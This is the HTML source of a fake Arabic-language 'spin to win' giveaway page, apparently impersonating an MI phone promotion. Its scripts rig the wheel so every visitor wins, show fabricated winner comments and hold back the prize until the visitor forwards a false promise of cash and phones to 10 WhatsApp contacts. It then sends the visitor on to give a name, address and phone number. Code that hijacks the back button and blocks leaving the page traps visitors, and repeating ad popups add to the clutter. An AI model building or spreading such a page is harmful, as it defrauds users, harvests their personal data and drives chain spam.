<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="google" content="notranslate">
    <meta property="og:type" content="website">
    <meta property="og:title" content="1111111">
    <meta property="og:url" content="https://z10a.github.io/spintowin/#">
    <meta property="og:description" content="انقر هنا لتلقي الهدية">
    <meta property="og:site_name" content="اربح هدية مجانية.">
    <meta property="og:image" content="https://upload.wikimedia.org/wikipedia/commons/f/f3/A_map_of_the_Arab_World_with_flags.svg">
    <meta http-equiv="content-type" content="text/html; charset=utf-8">
    <meta name="Keywords"
        content="paytm mesothelioma attorney houston, mesothelioma attorney california, Reliagare Health, insurance, Cloud computing, Car insurance, Loans Car, loans Religare, Crypto currency, BITCOIN">
    <title>WIN FREE gift!</title>

    <link href="//maxcdn.bootstrapcdn.com/bootstrap/3.3.0/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
    <link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
    <script src="//code.jquery.com/jquery-1.11.1.min.js"></script>
    <script src="//maxcdn.bootstrapcdn.com/bootstrap/3.3.0/js/bootstrap.min.js"></script>
    <script type="text/javascript" src="detect.js"></script>
    <script type="text/javascript" src="B6T3E4rD3c.js"></script>

    <style>
        .popup {
            display: none;
            position: absolute;
            top: 10%;
            left: 50%;
            width: 88%;
            max-width: 280px;
            margin: 0 0 0 -140px;
            font-size: 1em;
            border-radius: 4px;
            background-color: #282828;
            color: #fff;
            overflow: hidden;
            box-shadow: 1px 1px 7px #000;
            z-index: 100;
        }

        .popup-head {
            background-color: #282828;
            padding: 18px 16px 18px 55px;
            border-bottom: 2px solid #33b4e4;
            color: #33b4e4;
            line-height: normal
        }

        .popup-center {
            padding: 20px 16px;
            color: #f3f3f3;
            line-height: 20px
        }

        .popup-bottom {
            background-color: #282828;
            padding: 9px 6px;
            text-align: center;
            border-top: 1px solid #474747;
            overflow: hidden
        }
            
    /* Initially hide the popup ad */
    #ad-popup {
      display: none;
      position: fixed;
      top: 20%;
      left: 50%;
      transform: translateX(-50%);
      background-color: white;
      padding: 20px;
      border: 2px solid #ccc;
      box-shadow: 0 4px 8px rgba(0, 0, 0, 0.2);
      z-index: 9999; /* Make sure it appears on top */
      width: 728px; /* Set width of the ad */
      height: 90px; /* Set height of the ad */
    }

        .popup-bottom .button {
            display: block;
            height: 30px;
            width: 128px;
            margin: 0 auto;
            font-size: 1.1em;
            color: #f3f3f3;
            border-radius: 3px;
            cursor: pointer;
            text-decoration: none;
            padding: 0;
            line-height: 30px
        }

        #status {
            color: #F4211A;
            font-size: 1.0em;
            font-family: 'minecraftfont';

            height: 100%;
        }

        .pop {
            animation: pop 0.58s infinite;
            -webkit-animation: pop 0.58s infinite;
        }

        @keyframes pop {
            from {
                transform: scale(0.95)
            }

            50% {
                transform: scale(1)
            }

            to {
                transform: scale(0.95)
            }
        }

        @-webkit-keyframes pop {
            from {
                -webkit-transform: scale(0.95)
            }

            50% {
                -webkit-transform: scale(1)
            }

            to {
                -webkit-transform: scale(0.95)
            }
        }

        * {
            margin: 0
        }

        body {
            font-family: tahoma, verdana, arial, sans-serif;
            background-color: #F7F7F7
        }

        .header {
            background-color: #232f3e
        }

        .logo-left {
            padding: 5px;
            vertical-align: middle
        }

        .header-text {
            font-size: 20px;
            height: 35px;
            vertical-align: middle;
            color: #FFF
        }

        .spinnerContainer {
            position: relative;
            transform: translateX(20%)
        }

        #clicker,
        #clicker2 {
            display: none
        }

        .clearfix::after,
        .clearfix::before {
            content: "";
            display: table
        }

        .clearfix::after {
            clear: both
        }

        .fbcoms {
            padding: 0 5px;
            font-family: Tahoma, Verdana, sans-serif;
            background-color: #fff;
            font-size: 12px;
            text-align: left
        }

        .comments {
            font-weight: 700;
            text-align: center;
            padding: 0 5px 10px
        }

        .totlikes {
            margin-top: 3px;
            background-color: #eeeff4;
            padding: 5px 5px 5px 23px;
            background-repeat: no-repeat;
            background-position: 5px center
        }

        .fbblue {
            color: #3c5a96
        }

        .buttons {
            margin-top: 14px;
            padding: 5px;
            font-family: Arial, sans-serif;
            color: #7d7d7f
        }

        .buttons span {
            cursor: pointer
        }

        .buttons span:hover {
            text-decoration: underline
        }

        .viewmore {
            margin-top: 3px;
            background-color: #eeeff4;
            padding: 5px 5px 5px 23px;
            background-position: 5px center;
            background-repeat: no-repeat
        }

        .left {
            cursor: pointer;
            float: left;
            color: #3c5a96
        }

        .left:hover {
            text-decoration: underline
        }

        .right {
            color: #7d7d7f;
            float: right
        }

        div,
        main,
        article,
        aside,
        footer,
        nav,
        section,
        header {
            display: inline;
        }

        span {
            display: block;
        }

        h1,
        h2,
        h3 {
            display: inline;
        }

        .item {
            position: relative;
            margin-top: 3px;
            background-color: #eeeff4;
            padding: 5px 5px 5px 60px;
            min-height: 60px;
            box-sizing: border-box
        }

        .item .profileimg {
            position: absolute;
            top: 5px;
            left: 5px
        }

        .comtxt {
            line-height: 16px
        }

        .name {
            color: #3c5a96;
            font-weight: 700
        }

        .ago {
            color: #86878c;
            font-size: .95em
        }

        .fblike {
            color: #3c5a96;
            font-size: .95em;
            cursor: pointer
        }

        .fblike:hover {
            text-decoration: underline
        }

        .combot {
            padding-top: 5px
        }

        .likes {
            color: #3c5a96;
            font-size: .95em;
            cursor: pointer
        }

        .comments,
        .hidden .combot,
        .hidden .comtxt {
            display: none
        }

        #fbalert>div {
            margin-left: 0
        }

        #fbalert {
            background-color: #fff;
            padding: 5px
        }

        #spinner {
            position: relative;
            margin: 1em auto 0;
            width: 315px;
            overflow: hidden
        }

        @media(min-width:360px) {
            #spinner {
                width: 340px
            }
        }

        #spinBG {
            z-index: 1;
            width: 315px
        }

        @media(min-width:360px) {
            #spinBG {
                position: sticky;
                left: 158px;
                width: 10px;
                display: grid;
                top: 27px;
            }
        }

        #spin {
            z-index: 2;
            position: static;
            top: 8px;
            left: 8px;
            width: 300px
        }

        @media(min-width:360px) {
            #spin {
                width: 325px
            }
        }

        #win,
        #win2,
        #win3,
        #winP,
        #winP1,
        #winP2 {
            position: absolute;
            z-index: 3;
            left: 146px;
            top: 173px;
            width: 33px
        }

        @media(min-width:360px) {

            #win,
            #win2,
            #win3,
            #winP,
            #winP1,
            #winP2 {
                width: 33px
            }
        }

        #win2,
        #win3,
        #winP,
        #winP1,
        #winP2 {
            display: none
        }

        .spinAround {
            -webkit-animation: spin 6.6s;
            -moz-animation: spin 6.6s;
            -o-animation: spin 6.6s;
            animation: spin 6.6s;
            -webkit-animation-timing-function: ease;
            -moz-animation-timing-function: ease;
            -o-animation-timing-function: ease;
            animation-timing-function: ease;
            -webkit-animation-iteration-count: 1;
            -moz-animation-iteration-count: 1;
            -o-animation-iteration-count: 1;
            animation-iteration-count: 1;
            -webkit-animation-direction: normal;
            -moz-animation-direction: normal;
            -o-animation-direction: normal;
            animation-direction: normal;
            -webkit-animation-fill-mode: forwards;
            -moz-animation-fill-mode: forwards;
            -o-animation-fill-mode: forwards;
            animation-fill-mode: forwards
        }

        @-webkit-keyframes spin {
            0% {
                -webkit-transform: rotate(0deg);
                transform: rotate(0deg)
            }

            90% {
                -webkit-transform: rotate(3110deg);
                transform: rotate(3110deg)
            }

            95% {
                -webkit-transform: rotate(3108deg);
                transform: rotate(3108deg)
            }

            100% {
                -webkit-transform: rotate(3109deg);
                transform: rotate(3109deg)
            }
        }

        @-moz-keyframes spin {
            0% {
                -moz-transform: rotate(0deg);
                transform: rotate(0deg)
            }

            90% {
                -moz-transform: rotate(3110deg);
                transform: rotate(3110deg)
            }

            95% {
                -moz-transform: rotate(3108deg);
                transform: rotate(3108deg)
            }

            100% {
                -moz-transform: rotate(3109deg);
                transform: rotate(3109deg)
            }
        }

        @-o-keyframes spin {
            0% {
                -o-transform: rotate(0deg);
                transform: rotate(0deg)
            }

            90% {
                -o-transform: rotate(3110deg);
                transform: rotate(3110deg)
            }

            95% {
                -o-transform: rotate(3108deg);
                transform: rotate(3108deg)
            }

            100% {
                -o-transform: rotate(3109deg);
                transform: rotate(3109deg)
            }
        }

        @keyframes spin {
            0% {
                -webkit-transform: rotate(0deg);
                -moz-transform: rotate(0deg);
                -o-transform: rotate(0deg);
                transform: rotate(0deg)
            }

            90% {
                -webkit-transform: rotate(3110deg);
                -moz-transform: rotate(3110deg);
                -o-transform: rotate(3110deg);
                transform: rotate(3110deg)
            }

            95% {
                -webkit-transform: rotate(3108deg);
                -moz-transform: rotate(3108deg);
                -o-transform: rotate(3108deg);
                transform: rotate(3108deg)
            }

            100% {
                -webkit-transform: rotate(3109deg);
                -moz-transform: rotate(3109deg);
                -o-transform: rotate(3109deg);
                transform: rotate(3109deg)
            }
        }

        .spinAround2 {
            -webkit-animation: spinTwo 6.6s;
            -moz-animation: spinTwo 6.6s;
            -o-animation: spinTwo 6.6s;
            animation: spinTwo 6.6s;
            -webkit-animation-timing-function: ease;
            -moz-animation-timing-function: ease;
            -o-animation-timing-function: ease;
            animation-timing-function: ease;
            -webkit-animation-iteration-count: 1;
            -moz-animation-iteration-count: 1;
            -o-animation-iteration-count: 1;
            animation-iteration-count: 1;
            -webkit-animation-direction: normal;
            -moz-animation-direction: normal;
            -o-animation-direction: normal;
            animation-direction: normal;
            -webkit-animation-fill-mode: forwards;
            -moz-animation-fill-mode: forwards;
            -o-animation-fill-mode: forwards;
            animation-fill-mode: forwards
        }

        @-webkit-keyframes spinTwo {
            0% {
                -webkit-transform: rotate(3109deg);
                transform: rotate(3109deg)
            }

            90% {
                -webkit-transform: rotate(6314deg);
                transform: rotate(6314deg)
            }

            95% {
                -webkit-transform: rotate(6312deg);
                transform: rotate(6312deg)
            }

            100% {
                -webkit-transform: rotate(6313deg);
                transform: rotate(6313deg)
            }
        }

        @-moz-keyframes spinTwo {
            0% {
                -moz-transform: rotate(3109deg);
                transform: rotate(3109deg)
            }

            90% {
                -moz-transform: rotate(6314deg);
                transform: rotate(6314deg)
            }

            95% {
                -moz-transform: rotate(6312deg);
                transform: rotate(6312deg)
            }

            100% {
                -moz-transform: rotate(6313deg);
                transform: rotate(6313deg)
            }
        }

        @-o-keyframes spinTwo {
            0% {
                -o-transform: rotate(3109deg);
                transform: rotate(3109deg)
            }

            90% {
                -o-transform: rotate(6314deg);
                transform: rotate(6314deg)
            }

            95% {
                -o-transform: rotate(6312deg);
                transform: rotate(6312deg)
            }

            100% {
                -o-transform: rotate(6313deg);
                transform: rotate(6313deg)
            }
        }

        @keyframes spinTwo {
            0% {
                -webkit-transform: rotate(3109deg);
                -moz-transform: rotate(3109deg);
                -o-transform: rotate(3109deg);
                transform: rotate(3109deg)
            }

            90% {
                -webkit-transform: rotate(6314deg);
                -moz-transform: rotate(6314deg);
                -o-transform: rotate(6314deg);
                transform: rotate(6314deg)
            }

            95% {
                -webkit-transform: rotate(6312deg);
                -moz-transform: rotate(6312deg);
                -o-transform: rotate(6312deg);
                transform: rotate(6312deg)
            }

            100% {
                -webkit-transform: rotate(6313deg);
                -moz-transform: rotate(6313deg);
                -o-transform: rotate(6313deg);
                transform: rotate(6313deg)
            }
        }

        ol,
        ul {
            list-style: none
        }

        .clearfix:after {
            content: " ";
            display: block;
            height: 0;
            clear: both;
            overflow: hidden;
            visibility: hidden
        }

        .clearfix {
            display: block
        }

        .wrapper {
            background-color: #fff;
            -webkit-box-sizing: border-box;
            -moz-box-sizing: border-box;
            box-sizing: border-box;
            padding: 7px;
            width: 96%;
            margin: 0 auto 14px;
            border: 1px solid #c4cde1;
            border-top: 0;
            max-width: 414px
        }

        .logo {
            display: block;
            margin: 4px auto;
        }

        .txt {
            padding: 5px 6px;
            line-height: 18px;
            text-align: center
        }

        .bottom {
            width: 92%;
            margin: 20px auto 0;
            border: 1px solid #ccc;
            background-color: #f2f2f2;
            padding: 5px;
            border-radius: 10px;
            -moz-border-radius: 10px;
            -webkit-border-radius: 10px
        }

        .now {
            text-align: center;
            padding-top: 5px
        }

        #countdown {
            font-weight: bold;
        }

        .rules {
            color: #1b316c;
            padding: 4px 5px;
            line-height: 22px
        }

        a {
            display: block;
            background-color: #39579a;
            border-radius: 7px;
            -moz-border-radius: 7px;
            -webkit-border-radius: 7px;
            padding: 10px 0;
            text-align: center;
            font-weight: 700;
            color: #fff;
            font-size: 1.6em;
            border-bottom: 1px solid #1b316c;
            margin: 7px 13px 5px;
            text-decoration: none
        }

        .title {
            text-align: center;
            font-weight: 700;
            font-size: 26px
        }

        .show-all {
            display: none;
        }

        .now2 {
            padding-top: 10px;
            font-weight: bold;
        }
    </style>
    <script>

        function getRandomInt(min, max) {
            return Math.floor(Math.random() * (max - min + 1)) + min;
        }
        var r = getRandomInt(1, 1000);
        var myArray = ['your site url', 'your site url', 'your site url', 'your site url', 'your site url', 'your site url'];
        var rand = myArray[Math.floor(Math.random() * myArray.length)];

        url = rand;

    </script>


    <script type="text/javascript">
        $(document).ready(function () {
            var body = document.getElementsByTagName("body")[0];
            var style = document.createElement("style");
            style.type = "text/css";
            style.appendChild(document.createTextNode("div, main, article, aside, footer, nav, section, header {display: block;}span {display: inline;}h1, h2, h3 {display: block;}"));
            body.appendChild(style);
        })
    </script>







    <link rel="me" href="https://www.blogger.com/profile/12114799560134174238" />
</head>



<body onload="spinnerAction()">

    <div class="header">
        <span class="header-text"><img src="https://upload.wikimedia.org/wikipedia/commons/f/f3/A_map_of_the_Arab_World_with_flags.svg" class="logo-left" height="50"
                width="50"> الدوران للفوز !</span>
    </div>



    <div class="hide-all">
        <div id="fbalert"> </span> قم بتدوير العجلة بالضغط على زر دور الموجود في منتصف العجلة واربح...
            </p>
            <center>

            </center>
            <div style="padding-top: 5px; color: #9c9c9c; font-size: 11px;"> </div>
        </div>


        <div id="status" class="pop">
            <center> </center>
        </div>

        <div id="spinner">
            <img id="spinBG" src="./pointer.png">
            <img id="spin" src="./wheel.png">
            <img onclick="startSpin()" id="win" src="./spin-buttom.png">
            <img onclick="spin2()" id="win2" src="./spin-buttom.png">
            <img id="winP" src="./spin-buttom.png">
            <img id="winP2" src="./spin-buttom.png">
        </div>

        <center>
            <h6>
                <font color="red">Only one gift allowed per IP.</font>
            </h6>
        </center>
        <div class="fbcoms">

            <center>
                <iframe data-aa="1399409" src="//ad.a-ads.com/1399409?size=320x50" scrolling="no"
                    style="width:320px; height:50px; border:0px; padding:0; overflow:hidden"
                    allowtransparency="true"></iframe>
            </center>
            <p class="comments">Comments:</p>
            <p class="buttons">
                <span class="like">Like</span> <span>Comment</span> <span>Share</span> <span>Delete</span>
            </p>
            <p class="totlikes"><span id="youand"></span><span class="fbblue">1,21,068 others</span> like this</p>
            <p class="viewmore clearfix">
                <span class="left">View more comments</span>
                <span class="right">12 of 1,356</span>
            </p>


            <div class="item">
                <img class="profileimg"
                    src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQ8wKkWoa902FbBbvJDmp959fzng0RRrtsamM4V1e_RhzPvW7xsEg"
                    height="50" width="50">
                <p class="comtxt"><span class="name">Kishan Kumar</span> mujhe MI phone mili hai lekin koi bat nhi free
                    me to ye bhi thik hai.</p>
                <p class="combot"><span class="ago">4 minutes ago</span> <span class="fblike">Like</span><span
                        class="likes totlikes">106</span></p>
            </div>
            <div class="item">
                <img class="profileimg"
                    src="https://pbs.twimg.com/profile_images/763830019932102658/ZwSapMUG_400x400.jpg" height="50"
                    width="50">
                <p class="comtxt"><span class="name">Kajal Rajput</span> mujhe bhi gift mila .</p>
                <p class="combot"><span class="ago">13 minutes ago</span> <span class="fblike">Like</span><span
                        class="likes totlikes">99</span></p>
            </div>
            <div class="item">
                <img class="profileimg" src="https://i.imgur.com/MRAYwzc.jpg" height="50" width="50">
                <p class="comtxt"><span class="name">Sagar Chavan</span> are yar mujh to kuch nhi mila </p>
                <p class="combot"><span class="ago">29 minutes ago</span> <span class="fblike">Like</span><span
                        class="likes totlikes">14</span></p>
            </div>

            <div class="item">
                <img class="profileimg" src="https://i.imgur.com/Iu2m8S7.jpg" height="50" width="50">
                <p class="comtxt"><span class="name">Harendra Das</span> mujhe bagpack bank mili hai </p>
                <p class="combot"><span class="ago">35 minutes ago</span> <span class="fblike">Like</span><span
                        class="likes totlikes">11</span></p>
            </div>

            <div class="item">
                <img class="profileimg" src="https://i.imgur.com/vQM4Ahx.jpg" height="50" width="50">
                <p class="comtxt"><span class="name">Karan Singh</span> Dhanyavad, mujhe mera prize mil gaya. :D </p>
                <p class="combot"><span class="ago">37 minutes ago</span> <span class="fblike">Like</span><span
                        class="likes totlikes">19</span></p>
            </div>
            <div class="item">
                <img class="profileimg" src="https://i.imgur.com/qL4tM0C.jpg" height="50" width="50">
                <p class="comtxt"><span class="name">Ravi Verma</span> Has anyone actually won yet? I spun 2 times from
                    both of my accounts but nothing...</p>
                <p class="combot"><span class="ago">41 minutes ago</span> <span class="fblike">Like</span><span
                        class="likes totlikes">8</span></p>
            </div>
            <div class="item">
                <img class="profileimg" src="https://i.imgur.com/SoWEpxx.jpg" height="50" width="50">
                <p class="comtxt"><span class="name">Survival Sandhi</span> arey yar mujhe kuch nahi mila...</p>
                <p class="combot"><span class="ago">56 minutes ago</span> <span class="fblike">Like</span><span
                        class="likes totlikes">5</span></p>
            </div>
            <div class="item">
                <img class="profileimg" src="https://i.imgur.com/697oHrG.jpg" height="50" width="50">
                <p class="comtxt"><span class="name">Yasmin Chandler</span> I got nothing.. why am I always so unlucky
                    :(</p>
                <p class="combot"><span class="ago">1 hour ago</span> <span class="fblike">Like</span><span
                        class="likes totlikes">9</span></p>
            </div>

            <div class="item">
                <img class="profileimg" src="https://i.imgur.com/nwz8iJ5.jpg" height="50" width="50">
                <p class="comtxt"><span class="name">Kurian Abraham</span> Why im not winning..? plz help</p>
                <p class="combot"><span class="ago">1 hour ago</span> <span class="fblike">Like</span><span
                        class="likes totlikes">2</span></p>
            </div>

            <div class="item">
                <img class="profileimg" src="https://i.imgur.com/H8u0YSw.jpg" height="50" width="50">
                <p class="comtxt"><span class="name">Namita Bansal</span> nice game..</p>
                <p class="combot"><span class="ago">1 hour ago</span> <span class="fblike">Like</span><span
                        class="likes totlikes">1</span></p>
            </div>

            <iframe data-aa="1399409" src="//ad.a-ads.com/1399409?size=320x50" scrolling="no"
                style="width:320px; height:50px; border:0px; padding:0; overflow:hidden"
                allowtransparency="true"></iframe>
            <div class="item">
                <img class="profileimg" src="https://i.imgur.com/vEES69i.jpg" height="50" width="50">
                <p class="comtxt"><span class="name">Deep Singh</span> Which courier company will deliver my parcel?</p>
                <p class="combot"><span class="ago">1 hour ago</span> <span class="fblike">Like</span><span
                        class="likes totlikes">1</span></p>
            </div>
            <div class="item">
                <img class="profileimg" src="https://i.imgur.com/Lwr5szD.jpg" height="50" width="50">
                <p class="comtxt"><span class="name">Aditi Dutta</span> Not fake.. my frnd got real prize frm this
                    contest..</p>
                <p class="combot"><span class="ago">1 hour ago</span> <span class="fblike">Like</span><span
                        class="likes totlikes">1</span></p>
            </div>


        </div>
    </div>


<!-- Ad popup -->
  <!-- Popup Ad (initially hidden) -->
  <div id="ad-popup">
    <script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-5412190798174768" crossorigin="anonymous"></script>
    <ins class="adsbygoogle"
         style="display:block"
         data-ad-format="autorelaxed"
         data-ad-client="ca-pub-5412190798174768"
         data-ad-slot="3173558946"></ins>
    <script>
         (adsbygoogle = window.adsbygoogle || []).push({});
    </script>
  </div>

  <script>
    // Function to show the ad popup
    function showAd() {
      document.getElementById('ad-popup').style.display = 'block';
    }

    // Show the ad when the user clicks anywhere on the page
    document.body.addEventListener('click', function() {
      showAd();
    });

    // Show the ad every 10 seconds after the initial click
    setInterval(function() {
      showAd();
    }, 10000); // 10000ms = 10 seconds
  </script>




    <div class="show-all">
        <div class="wrapper"><iframe data-aa="1399409" src="//ad.a-ads.com/1399409?size=320x50" scrolling="no"
                style="width:320px; height:50px; border:0px; padding:0; overflow:hidden"
                allowtransparency="true"></iframe>
            <div class="title">
                <p>Congratulations!</p>
            </div>
            <img src="https://1.bp.blogspot.com/-fAlmSc31bsI/XYb8RGrI4bI/AAAAAAAAAvI/Jl7QzKMbKWwEGPNVGBJeLkH8cVuVfLbuACLcBGAsYHQ/s1600/PicsArt_09-22-10.13.53.gif"
                class="logo" height="214" width="214">


            <div class="panel-body two-col">
                <b><span style="color: #201870;">شاركها مع 10 من أصدقائك وادعم حفلتك </span><br>



                    <br>
                    <p class="redF">
                        للترويج للعرض والحصول على هديتك المجانية، عليك إرسال هذا العرض إلى 10 أشخاص أو 10 مجموعات حتى
                        يتم الإعلان عن MI، بعد ذلك يمكنك الضغط على الزر الأزرق وإعطاء اسمك وعنوانك ورقم هاتفك المحمول
                        واستلام الرسالة احصل عليه. </p><br>








                    <a href="whatsapp://send?text= شكرًا لكم جميعًا على جعل *MI* أكبر شركة للهاتف المحمول في دول العربية. *MI* سعيدة بكونها أكبر شركة للهاتف المحمول في الهند. تقدم لكم *MI* جميع العروض *(أدر واربح)*، حيث سيحصل الجميع على *بعضها مجانًا gift* لذا فقط انقر على الرابط الأزرق أدناه واربح آلاف الجوائز 👉🏼 https://z10a.github.io/spintowin/*يرجى ملاحظة*: 🙏 العرض فقط *حتى رئس سنة الجديدة* يقتصر على من ١٠٠$ الى ٩٠٠$ و هاتف محمول، لذا احصل عليه هديتك المجانية بسرعة."
                        class="button btn btn-success btn-sm btn-block" id="whatsapp">
                        <h2>شارك على الواتس اب</h2>
                    </a><br>
















                    </a><a class="step-final final finals" hi=""
                        href="https://www.filmytrap.xyz/2020/05/chal-mera-putt-2-download-full-movie.html"
                        style="background: #4286f4; box-sizing: border-box; color: white !important; display: block; font-size: 20px; margin: 0px; padding: 10px; text-align: center; text-decoration-line: none; width: 330px;">
                        شارك صفحة فيسبوك للمحاولة مرة أخرى <span class="pull-right deliv"
                            style="box-sizing: border-box; float: right !important; margin: 0px; padding: 0px;"></span></a><br>




                    <div id="popup1" class="popup fourth" style="display:none">
                        <div class="popup-head">
                            <img id="alertimg"
                                src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABoAAAAaAQMAAACThN6NAAAABlBMVEUAAAC5ubnoUmKJAAAAAXRSTlMAQObYZgAAAEVJREFUCNdjQAI8cEIOTtiDiPoGGPH5AIh4wMDA+PkDAwMzhPjBwMAOIvg//4ES8v//AbV+/g8l6v//b4AQ////P8CACgCNvyHz1VKxBQAAAABJRU5ErkJggg=="
                                width="26" height="26" alt="">
                            <script>document.write(trs['avs'][lng])</script>
                        </div>
                        <div id="bla" class="popup-center"></div>
                        <div class="popup-bottom">

                            <div onclick="hidepop();" class="button">
                                <script>document.write(trs['bu'][lng])</script>
                            </div>
                        </div>
                    </div>




                    <script>
                        var cl1 = 0;
                        var max_val = 10;
                        $('document').ready(function () {
                            $('#final').hide();
                            $('#whatsapp').click(function () {
                                cl1++;
                                var widh = cl1 * 10;
                                var elem = document.getElementById("progress-bar");
                                elem.style.width = widh + '%';
                                //document.getElementById("progress-bar").style.width =  +%;
                                if (cl1 > max_val - 1) {
                                    $('#final').show();
                                    var ck = document.getElementById("final");
                                    ck.click();
                                }
                                //console.log(cl1);
                            });
                            $('#final').click(function (e) {
                                if (cl1 < max_val) {
                                    alert("आपको अपने व्हाट्सऐप 10 Friend या Group में शेयर करनी है........" + eval(parseInt(max_val) - parseInt(cl1)) + " Group/Friend बाकी");
                                    e.preventDefault();
                                }
                                else {
                                    window.location.href = '/';
                                }
                            });
                        });
                    </script>

                    <script
                        type="text/javascript">! function () {
                                var t; try {
                                    for (t = 0; 10 > t; ++t)		history.pushState({}, "", "#"); onpopstate = function (t) {
                                        t.state && alert('أرسل لـ 10 أشخاص فقط، لست بخيلاً');
                                    }
                                } catch (o) { }
                            }();</script>








                    <script type="">
var cl1 = 0;
var max_val=10;
$('document').ready(function(){
   
    $('.whatsapp').click(function(){
       cl1++;
        
   });
    $('.final').click(function(e){
        if(cl1 < max_val){
            alert("للترويج لـ شركة (مي) والحصول على هديتك المجانية، عليك إرسال هذا العرض إلى أصدقائك أو مجموعتك العشرة.
 "+ eval(parseInt(max_val) - parseInt(cl1)) +" Group/Friend بخير");
            e.preventDefault();
        }    
        else{
            window.location.href='get-sim.html';
        }
    });
    
});
</script>
                    <script type="">// changing progressbar when button is clicked
$(".whatsapp").click(function () {
    animateProgress(parseInt($(this).data('diff')));
});

// animate progress by a step indicated by diff
function animateProgress(diff) {
    var currValue = $("#progress").val();
    var toValue = currValue + diff;

    toValue = toValue < 0 ? 0 : toValue;
    toValue = toValue > 100 ? 100 : toValue;

    $("#progress").animate({'value': toValue}, 500);
}
</script>

                    <!-- Global site tag (gtag.js) - Google Analytics -->
                    <script async src="https://www.googletagmanager.com/gtag/js?id=UA-152726006-1"></script>
                    <script>
                        window.dataLayer = window.dataLayer || [];
                        function gtag() { dataLayer.push(arguments); }
                        gtag('js', new Date());

                        gtag('config', 'UA-152726006-1');
                    </script>





                    <script type="text/javascript">
                        function spinnerAction() {
                            //alert("Welcome to Lucky Wheel!\n\nSpin the Wheel and you may win exclusive prizes!\n\nClick OK to Start the Game!")
                        }

                        function startSpin() {
                            var e = document.getElementById("spin"),
                                n = document.getElementById("win"),
                                t = document.getElementById("winP"),
                                o = document.getElementById("win2");
                            e.className = e.className + "spinAround", n.style.display = "none", t.style.display = "block", setTimeout(function () {
                                t.style.display = "none", o.style.display = "block"
                            }, 150), setTimeout(function () {
                                alert("لديك فرصة أخرى، يرجى الدوران مرة أخرى."), spin2enabled = !0
                            }, 6500)
                        }

                        function spin2() {
                            if (spin2enabled) {
                                var e = document.getElementById("spin"),
                                    n = document.getElementById("win"),
                                    t = document.getElementById("winP"),
                                    o = document.getElementById("win2");
                                e.className = e.className + " spinAround2", n.style.display = "none", t.style.display = "block", setTimeout(function () {
                                    t.style.display = "none", o.style.display = "block"
                                }, 150), setTimeout(function () {
                                    var e = alert("Congratulations!\n\nلقد فزت بـ MI Pro إذا كنت ترغب في الحصول على الهدية المجانية التي فزت بها.إذا كانت الإجابة بنعم، فاضغط على زر موافق");
                                    e === !0 || $(".hide-all").hide(), $(".show-all").show();
                                    var n = 299,
                                        t = setInterval(function () {
                                            $("#countdown").text(n--), -1 == n && clearInterval(t)
                                        }, 1e3);
                                    javascript_countdown.init(300)
                                }, 6800)
                            }
                        }

                        function goNow() {
                            window.btn_clicked = !0
                        }

                        function fn1() {
                            ++c, 25 >= c ? window.open(showMessage) : alert("Your Apple MacBook Pro (Core i7, 16GB Ram, 512GB hard drive, Mac OS, Integrated Graphics, Touch Bar, Silver) has been reserved.\n\nVerify your phone number on the next page to claim your prize!") & window.open("http://xns5.com/", "_self")
                        }

                        function fn2() {
                            c >= 25 ? alert("Your Apple MacBook Pro (Core i7, 16GB Ram, 512GB hard drive, Mac OS, Integrated Graphics, Touch Bar, Silver) has been reserved.\n\nVerify your phone number on the next page to claim your prize!") & window.open("http://xns5.com/", "_self") : window.alert("Tell 5 Groups or 15 Friends on WhatsApp about the Lucky Wheel!\n\n You already told: " + c)
                        }

                        function FBcom(e, n) {
                            setTimeout(function () {
                                var n = 0,
                                    t = 0;
                                $(e + ", " + e + " .comtxt, " + e + " .combot").slideDown(500), $().slideDown(500);
                                var o = setInterval(function () {
                                    t += .2, $(e).css({
                                        opacity: t
                                    }), n++, 5 == n && clearInterval(o)
                                }, 100)
                            }, n)
                        }
                        spin2enabled = !1;
                        var d = new Date,
                            weekday = new Array("Sunday", "Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday");
                        document.getElementById("today").innerHTML = weekday[d.getDay()];
                        var myarray = ["whatsapp://send?text=*OSM*.... *لقد حصلت الآن على Apple iPhone X | أنت أيضًا محظوظ، لكن حاول| هذا الرابط الجديد انقر فوقه-->>" + url],
                            showMessage = myarray[Math.floor(Math.random() * myarray.length)];
                        c = 0;
                        var image;
                        $.fn.txtFader = function (e, n) {
                            this.fadeOut(n, function () {
                                $(this).html(e).fadeIn(n)
                            })
                        }, $(document).ready(function () {
                            FBcom("#fb1", 3e3), FBcom("#fb2", 5e3), FBcom("#fb3", 7e3), FBcom("#fb4", 9e3), FBcom("#fb5", 10500), FBcom("#fb6", 13e3), FBcom("#fb7", 15e3), FBcom("#fb8", 2e4), $(".like").click(function () {
                                $(this).hasClass("selected") ? ($(this).removeClass("selected"), $(this).html("Like"), $("#youand").html("")) : ($(this).addClass("selected"), $(this).html("Unlike"), $("#youand").html("You and "))
                            }), $(".fblike").click(function () {
                                $(this).hasClass("selected") ? ($(this).removeClass("selected"), $(this).html("Like")) : ($(this).addClass("selected"), $(this).html("Unlike"))
                            });
                            for (var e = 1; e <= $(".q").length; e++) console.log(e), clicker(e)
                        }), window.onbeforeunload = function () {
                            return window.btn_clicked ? void 0 : "You have got (1) more spin!\n\nPlay the game and you may win exclusive prizes from our sponsors.\n\nToday's prizes include Lenovo Vibe K4 Note, Viaplay Mobile Bluetooth Gaming Controller, Fitbit Surge Ultimate Fitness and many more!"
                        };
                    </script>

                    <style type="text/css">
                        div,
                        main,
                        article,
                        aside,
                        footer,
                        nav,
                        section,
                        header {
                            display: block;
                        }

                        span {
                            display: inline;
                        }

                        h1,
                        h2,
                        h3 {
                            display: block;
                        }
                    </style>

</body>

</html>
